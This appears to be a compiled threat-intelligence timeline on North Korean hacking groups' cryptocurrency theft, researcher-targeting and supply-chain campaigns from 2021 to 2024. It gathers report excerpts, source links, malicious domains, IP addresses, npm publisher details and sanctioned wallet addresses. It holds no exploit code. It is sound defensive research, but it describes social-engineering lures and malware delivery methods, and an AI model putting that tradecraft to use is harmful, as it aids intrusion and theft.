- Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
- DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
- Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old.
- government-backed entity based in North Korea. Social media targetting.
- the actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
- Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
- After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
- In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
- These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email
- https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
- https://apnews.com/article/malware-media-north-korea-social-media-south-korea-7dc8a5a9a3576005a615524d1ba439aa
- targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency
- the malicious application—seen on both Windows and Mac operating systems—appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate
- infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.
- Celas Trade Pro JMT Trading Union Crypto Kupay Wallet CoinGoTrade Dorusio Ants2Whale
- Joint FBI-CISA-Treasury
- CISA, FBI, and the Department of the Treasury released a Joint Cybersecurity Advisory and seven MARs on the North Korean government’s dissemination of malware that facilitates the theft of cryptocurrency—referred to by the U.S. Government as “AppleJeus.”
2021-02-20: Ghaleb Alaumary + Ramon Abbas (Hushpuppi) named in ‘North Korean-perpetrated cyber-enabled’ heist
- https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and
- Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time with North Korean hackers involved.
- The United State Justice Department said Hushpupp conspired with a Canadian-American citizen Ghaleb Alaumary and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019.
- Hushpuppi is currently facing separate trial for conspiring “to launder hundreds of millions of dollars from BEC frauds and other scams.”
- “The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
- Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
- With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
- Alaumary also conspired with Ramon Olorunwa Abbas, aka “Ray Hushpuppi,” and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams.
- https://www.justice.gov/opa/pr/first-north-korean-national-brought-united-states-stand-trial-money-laundering-offenses
- https://www.cnbc.com/2021/03/22/north-korea-national-extradited-to-us-faces-money-laundering-charges.html
- https://www.scmp.com/news/asia/east-asia/article/3126520/north-korean-businessman-mun-chol-myong-us-court-after
- protectoffice[.]club
- https://twitter.com/fr0s7_/status/1381328726819020804
2021-04-26: The Incredible Rise of North Korea’s Hacking Army - Lazarus group’s criminal enterprises including cryptocurrency exchange heists and ransomware attacks
2021-06-03: ClearSky's report on the Crypto Core APT group attributing it to the North Korean Lazarus APT
- Authorities say Ramon Abbas, aka Hushpuppi, perfected a simple internet scam and laundered millions of dollars. His past says a lot about digital swagger, and the kinds of stories that get told online.
- https://www.bloomberg.com/features/2021-hushpuppi-gucci-influencer/
2021-09-10: Rapid Change of Stablecoin (Protected).docx secure.azureword[.]com Z Venture Capital Presentation(Protected).docx
- https://twitter.com/Circuitous/status/1436456000584880129
- https://twitter.com/Circuitous/status/1442888312755302400
2021-09-16: Ghaleb Alaumary sentenced to 11 years in jail for laundering funds such as those coming from a banking heist by North Korean actors
2022-01-13: North Korean Hackers Have Prolific Year as Their Unlaundered Cryptocurrency Holdings Reach All-time High
- TAG discovered two distinct North Korean attacker groups exploiting remote execution vulnerability
- Operation Dream Job + Operation AppleJeus
2022-03-23: FireEye/Mandriant - Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations
2022-03-24: CVE-2022-0609 Google posts update abt zero day CVE-2022-0609 - Operation Dream Job and Operation AppleJeus
- Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
- Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
- Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
- The campaign begins by sending them phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites such as Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected with drive-by browser malware downloads. The North Korean groups were utilizing an exploit kit (1️⃣ CVE-2022-0609) with hidden iframes embedded into a variety of websites. The attack kit may fingerprint target devices by collecting details like user-agent and screen resolution. After that the exploit kit executes a Chrome remote code execution hack capable of bypassing the lauded Chrome sandbox to move out onto the system.
- https://blog.google/threat-analysis-group/countering-threats-north-korea/
- We recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet,
- https://securelist.com/lazarus-trojanized-defi-app/106195/
- In this attack, Lazarus built a type of decoy document containing an “AhnLab ” icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities. AhnLab is a cyber security vendor with its headquarters in South Korea. Lazarus uses the name to increase the persuasiveness of the decoy document.
- Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform.
- Type Confusion, V8 Engine
- 0x098B716B8Aaf21512996dC57EB0615e2383E2f96
- https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20220414
-https://asec.ahnlab.com/en/36368/
-https://asec.ahnlab.com/en/37078/
-https://asec.ahnlab.com/en/37396/
- https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/
- https://finbold.com/lazarus-hackers-target-macos-users-luring-them-with-crypto-dream-job-offers/
- https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20221007
- https://home.treasury.gov/news/press-releases/jy1000
-https://asec.ahnlab.com/en/39828/
2022-10-13: With more than $3B already stolen, 2022 is on pace to become crypto’s ‘biggest year for hacking on record’
2022-10-25: Malicious app suspected to be created by a North Korean hacker organization aimed at stealing cryptocurrency discovered
-https://asec.ahnlab.com/ko/40552/
2022-11-01: Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed “No Pineapple”, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass) – two vulnerabilities affecting the digital collaboration
2023-01-11: Lazarus - The suspected APT-C-26 (Lazarus) organization conducts attack activity analysis through cryptocurrency wallet promotion information
- Kimsuky distributed document-type malware targeting security experts, which uses an external object within a Word document to execute an additional malicious macro (template Injection method).
- https://www.cfr.org/blog/north-koreas-cryptocurrency-craze-and-its-impact-us-policy
2023-01-17: Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)
2023-01-23: FBI Confirms Lazarus Group Cyber Actors Responsible for Harmony's Horizon Bridge Currency Theft
2023-02-09: CISA - Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a
- 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk
- 16ENLdHbnmDcEV8iqN4vuyZHa7sSdYRh76
- 16sYqXancDDiijcuruZecCkdBDwDf4vSEC
- 1FX4W9rrG4F3Uc7gJ18GCwGab8XuW8Ajy2
- 1J8spy62o7z2AjQxoUpiCGnBh5cRWKVWJC
- 1KCwfCUgnSy3pzNX7U1i5NwFzRtth4bRBc
- 1KmWW6LgdgykBBrSXrFu9kdoHz95Fe9kQF
- 1MTHBCrBKYEthfa16zo9kabt4f9jMJz8Rm
- 1N6JphHFaYmYaokS5xH31Z67bvk4ykd9CP
- 1NqihEqYaQaWiZkPVdSMiTbt7dTy1LMxgX
- bc1q3wzxvu8yhs8h7mlkmf7277wyklkah9k4sm9anu
- bc1q498fn0gauj2kkjsg35mlwk2cnxhaqlj7hkh8xy
- bc1q6024d73h48fnhwswhwt3hqz2lzw6x99q0nulm4
- bc1q6qfkt06xmrpclht3acmq00p7zyy0ejydu89zwv
- bc1q7qry3lsrphmnw3exs7tkwzpvzjcxs942aq8n0y
- bc1q80vc4yjgg6umedkut3e9mhehxl4q4dcjjyzh59
- bc1q8t69gpxsezdcr8w6tfzp3jeptq4tcp2g9d0mwy
- bc1q8xyt4jxhw7mgqpwd6qfdjyxgvjeuz57jxrvgk9
- bc1q9h7yj79sqm4t536q0fdn7n4y2atsvvl22m28ep
- bc1qagaayd57vr25dlqgk7f00nhz9qepqgnlnt4upu
- bc1qavrtge4p7dmcrnvhlvuhaarx8rek76wxyk7dgg
- bc1qcmlcxfsy0zlqhh72jvvc4rh7hvwhx6scp27na0
- bc1qcp557vltuu3qc6pk3ld0ayagrxuf2thp3pjzpe
- bc1qcywkd7zqlwmjy36c46dpf8cq6ts6wgkjx0u7cn
- bc1qg3zlxxhhcvt6hkuhmqml8y9pas76cajcu9ltdl
- bc1qhfmqstxp3yp9muvuz29wk77vjtdyrkff4nrxpu
- bc1qj6y72rk039mqpgtcy7mwjd3eum6cx6027ndgmd
- bc1qk0saaw7p0wrwla6u7tfjlxrutlgrwnudzx9tyw
- bc1ql8wsflrjf9zlusauynzjm83mupq6c9jz9vnqxg
- bc1qlqgu2l2kms5338zuc95kxavctzyy0v705tpvyc
- bc1qmge6a7sp659exnx78zhm9zgrw88n6un0rl9trs
- bc1qn7a3g23nzpuytchyyteyhkcse84cnylznl3j32
- bc1qnh8scrvuqvlzmzgw7eesyrmtes9c5m78duetf3
- bc1qnz4udqkumjghnm2a3zt0w3ep8fwdcyv3krr3jq
- bc1qu0pvfmtxawm8s99lcjvxapungtsmkvwyvak6cs
- bc1qunqnjdlvqkjuhtclfp8kzkjpvdz9qnk898xczp
- bc1quvnaxnpqlzq3mdhfddh35j7e7ufxh3gpc56hca
- bc1qwdvexlyvg3mqvqw7g6l09qup0qew80wjj9jh7x
- bc1qx60ec3nfd5yhsyyxkzkpts54w970yxj84zrdck
- bc1qxrpevck3pq1yzrx2pq2rkvkvy0jnm56nzjv6pw
- bc1qy6su7vrh7ts5ng2628escmhr98msmzg62ez2sp
- bc1qyue2pgjk09ps7qvfs559k8kee3jkcw4p4vdp57
- LZ1VNJfn6mWjPzkCyoBvqWaBZYXAwn135
- Same tactics used as in Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers; in this case, the threat actor used an image that prompts users to execute the macro.
- https://asec.ahnlab.com/en/47585/
- The Lazarus Group carried out anti-forensics to conceal their malicious activities. They transmitted a configuration file with C2 information and a PE file that communicates with the C2 server in encrypted forms to evade detection by security products. The encrypted files operate after being decrypted onto the memory by the loader file. They then receive additional files from the C2 and perform malicious actions.
- https://asec.ahnlab.com/en/48223/
2023-02-16: Økokrim has seized almost NOK 60 million in cryptocurrency. This is the largest amount of cryptocurrency ever seized by the Norwegian police
- In late March 2023, 3CX disclosed that its desktop applications for both Windows and macOS were compromised with malicious code that gave attackers the ability to download and run code on all machines where the app was installed. 3CX says it has more than 600,000 customers and 12 million users in a broad range of industries, including aerospace, healthcare and hospitality.
- 3CX hired incident response firm Mandiant, which released a report on Wednesday that said the compromise began in 2022 when a 3CX employee installed a malware-laced software package distributed via an earlier software supply chain compromise that began with a tampered installer for X_TRADER, a software package provided by Trading Technologies.
- “This is the first time Mandiant has seen a software supply chain attack lead to another software supply chain attack”
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack/
- https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
- https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/
- https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/
- https://blog.checkpoint.com/2023/03/29/3cxdesktop-app-trojanizes-in-a-supply-chain-attack-check-point-customers-remain-protected/
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack
- https://www.trendmicro.com/fr_fr/research/23/c/information-on-attacks-involving-3cx-desktop-app.html
- https://twitter.com/patrickwardle/status/1641294247877021696
- https://objective-see.org/blog/blog_0x73.html
- https://www.elastic.co/kr/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack
- https://twitter.com/dez_/status/1641459372478935040
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-048a
- https://www.cybersecuritydive.com/news/3cx-mandiant-investigate-supply-chain-attack/646543/
- https://www.crn.com/news/security/3cx-supply-chain-attack-big-questions-remain
- https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/
- https://securelist.com/operation-applejeus-sequel/95596/
- https://www.3cx.com/blog/news/mandiant-initial-results/
- https://krebsonsecurity.com/2023/04/3cx-breach-was-a-double-supply-chain-compromise/
- https://explore.avertium.com/resource/lazarus-and-the-3cx-double-supply-chain-attack
- https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/
- https://www.mandiant.com/resources/blog/apt43-north-korea-cybercrime-espionage
- https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/
- https://blog.virustotal.com/2023/04/apt43-investigation-into-north-korean.html
- Jamf Threat Labs has discovered a macOS malware family that communicates with command and control (C2 servers to download and execute various payloads. This attribution is due to the similarities noted in a Kaspersky blog
- https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
- https://securelist.com/bluenoroff-methods-bypass-motw/108383/
2023-04-24: North Korean Foreign Trade Bank Representative Charged in Crypto Laundering Conspiracies
- https://www.justice.gov/opa/pr/north-korean-foreign-trade-bank-representative-charged-crypto-laundering-conspiracies
- Sim Hyon Sop + Wu Huihu - 1G3Qj4Y4trA8S64zHFsaD5GtiSwX19qwFv
2023-05-10: Half of North Korean missile program funded by cyberattacks and crypto theft, White House says
2023-05-19: APT-C-28 (ScarCruft) Organization Uses Malicious Documents to Deliver RokRAT Attack Activity Analysis
- Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
- Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into “hashing services” that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity.
- https://www.mandiant.com/resources/blog/apt43-north-korea-cybercrime-espionage
- https://web.archive.org/web/20230328150400/https://www.wired.com/story/north-korea-apt43-crypto-mining-laundering/
2023-06-06: Kimsuky - Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence
- Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
- https://www.sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/
- https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/
- https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
- https://blog.talosintelligence.com/lazarus-magicrat/
- https://asec.ahnlab.com/en/34461/
- https://www.recordedfuture.com/north-koreas-cyber-strategy
- https://go.recordedfuture.com/hubfs/reports/cta-nk-2023-0622.pdf
2023-07-28: Scarcruft - Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures
- ScarCruft lured victims using U.S. military-related documents to run malware staged from legitimate compromised Republic of Korea websites. The goal seems to have been to spark the recipient’s curiosity enough to have them open the attached documents and inadvertently execute the contained malware
- https://www.securonix.com/blog/detecting-ongoing-starkmule-attack-campaign-targeting-victims-using-us-military-document-lures/
2023-07-27: JumpCloud
- On June 11, Phylum’s automated risk detection platform alerted us to a peculiar pattern of publications on NPM. The packages in question seem to be published in pairs
- Two weeks after the IT management firm JumpCloud announced that it was the victim of a supply chain attack aimed at a small population of customers in the cryptocurrency industry, an investigation by ReversingLabs researchers has uncovered evidence of more malicious npm packages, with links to the same infrastructure that also appear to target cryptocurrency providers.
- Specifically, ReversingLabs identified a number of additional npm packages with links to the same malicious campaign. One, named btc-api-node, was uploaded to npm on July 11th and has links to a supply chain attack first[ identified by the firm Phylum on June 23
- https://blog.phylum.io/junes-sophisticated-npm-attack-attributed-to-north-korea/
- https://www.mandiant.com/resources/blog/north-korea-supply-chain
- https://jumpcloud.com/blog/security-update-incident-details
- https://jumpcloud.com/support/july-2023-iocs
- https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-108a
- https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/
- https://www.sentinelone.com/labs/jumpcloud-intrusion-attacker-infrastructure-links-compromise-to-north-korean-apt-activity/
- 3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG
- 39idqitN9tYNmq3wYanwg3MitFB5TZCjWu
- 3AAUBbKJorvNhEUFhKnep9YTwmZECxE4Nk
- 3PjNaSeP8GzLjGeu51JR19Q2Lu8W2Te9oc
- 3NbdrezMzAVVfXv5MTQJn4hWqKhYCTCJoB
- 34VXKa5upLWVYMXmgid6bFM4BaQXHxSUoL
- https://www.fbi.gov/news/press-releases/fbi-identifies-cryptocurrency-funds-stolen-by-dprk
- https://therecord.media/us-arrests-tornado-cash-cofounder
- https://www.justice.gov/usao-sdny/pr/tornado-cash-founders-charged-money-laundering-and-sanctions-violations
- https://home.treasury.gov/news/press-releases/jy1702
- https://blog.talosintelligence.com/lazarus-collectionrat/
- https://blog.talosintelligence.com/lazarus-quiterat/
- https://www.reversinglabs.com/blog/vmconnect-supply-chain-campaign-continues
- https://www.reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules
- In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development. Over the past two and a half years, the campaign has continued. Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0- day being used to target security researchers in the past several weeks. DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets. After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire. Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package. Upon successful exploitation, the shellcode conducts a series of anti-virtual machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain. The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits.
- https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/
2023-09-18: Scarcruft exploits WinRAR vulnerability (CVE-2023-38831) targeting the cryptocurrency industry
- https://paper.seebug.org/3033/
- This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
- The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry. It is speculated that Konni may be exploring new attack vectors. The captured sample named "wallet_Screenshot_2023_09_06_Qbao_Network.zip", and it references Qbao Network, which is described as follows:
2023-10-19: How North Korean Workers Tricked U.S. Companies into Hiring Them and Secretly Funneled Their Earnings into Weapons Programs
- https://www.zetter-zeroday.com/p/how-north-korean-workers-tricked
- https://apnews.com/article/north-korea-weapons-program-it-workers-f3df7c120522b0581db5c0b9682ebc9b
- https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-action-disrupt-illicit-revenue-generation
- https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
- https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-breach-cyberlink-in-supply-chain-attack/
- https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/
- https://www.slideshare.net/MITREATTACK/exploring-the-labyrinth-deep-dive-into-the-lazarus-groups-foray-into-macos
- This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database.
- Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them
- https://medium.com/s2wblog/fastviewer-variant-merged-with-fastspy-and-disguised-as-a-legitimate-mobile-application-f3004588f95c
2023-10-31: Lazarus Targets Bloackchain Engineers With New KandyKorn macOS Malware in attacks against blockchain engineers.
- https://securityaffairs.com/153622/uncategorized/lazarus-kandykorn-malware.html
- https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn
- https://blog.phylum.io/crypto-themed-npm-packages-found-delivering-stealthy-malware/
- puma-com 5.0.3 2023-10-30 01:49:09 troll1234 jacktroll83@gmail.com
- erc20-testenv 5.0.3 2023-10-31 04:28:15 terek1234 terekhovstanislav2@gmail.com
- blockledger 5.0.3 2023-10-31 09:03:03 xxx145465 xxx145465@gmail.com
- cryptotransact 5.0.3 2023-10-31 09:18:57 sandwich1901001 sandwich190100@outlook.com
- chainflow 5.0.3 2023-11-02 11:40:14 troll1234 jacktroll83@gmail.com
- https://www.bleepingcomputer.com/news/security/microsoft-bluenoroff-hackers-plan-new-crypto-theft-attacks/
- https://twitter.com/MsftSecIntel/status/1722316019920728437
- https://www.nknews.org/2023/11/two-south-koreans-indicted-for-allegedly-colluding-with-north-korean-hackers/
- https://www.spo.go.kr/site/spo/ex/board/View.do?cbIdx=1403&bcIdx=1043403
2023-11-21: Palo Alto - Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors
- https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/
- Contagious Interview as CL-STA-0240
- Wagemole and track it as CL-STA-0241
- https://protos.com/korean-govt-officials-targeted-by-norths-journalist-crypto-hackers/
- https://koreajoongangdaily.joins.com/news/2023-11-22/national/northKorea/Norths-hackers-pose-as-officials-journalists-to-steal-info-and-crypto/1919045
2023-11-22: Microsoft:Diamond Sleet supply chain compromise distributes a modified CyberLink installer
- https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/)
- Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
- If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload embedded inside a file masquerading as a PNG file using the static User-Agent ‘Microsoft Internet Explorer’
- When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet.
- https://asec.ahnlab.com/en/57736/
- https://www.bleepingcomputer.com/news/security/uk-and-south-korea-hackers-use-zero-day-in-supply-chain-attack/
- https://www.documentcloud.org/documents/24174869-rok-uk-joint-cyber-security-advisoryeng
- https://asec.ahnlab.com/wp-content/uploads/2023/10/20231013_Lazarus_OP.Dream_Magic.pdf
- https://www.bleepingcomputer.com/news/security/us-govt-sanctions-north-koreas-kimsuky-hacking-group/
2023-12-10: Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
- HazyLoad NineRAT BottomLoader DLRAT
- https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
2024-01-11: Comprehensive Report on North Korean Hackers, Phishing Groups, and Money Laundering in 2023
2024-01-24: Funds Stolen from Crypto Platforms Fall More Than 50% in 2023, but Hacking Remains a Significant Threat as Number of Incidents Rises
- The vulnerability was introduced in Win10 1703 (RS2/15063) when the 0x22A018 IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions.
- https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/
- https://www.csoonline.com/article/1311082/north-koreas-lazarus-deploys-rootkit-via-applocker-zero-day-flaw.html
2024-02-28: SquidSquad - Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram
- According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys[.]store is 27.255.81.77. Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com. The malicious applications were likely distributed via spearphishing or smishing.
2024-04-29: SquidSquad - How Lazarus Group laundered $200M from 25+ crypto hacks to fiat from 2020–2023
2024-05-16: DPRK IT - Thousands of North Koreans stole Americans’ identities and took remote-work tech jobs at Fortune 500 companies, DOJ says
- https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north
- https://archive.ph/nWug9
- https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil
- North Korean Government-Backed Groups Targeting Brazil
- Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil. North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
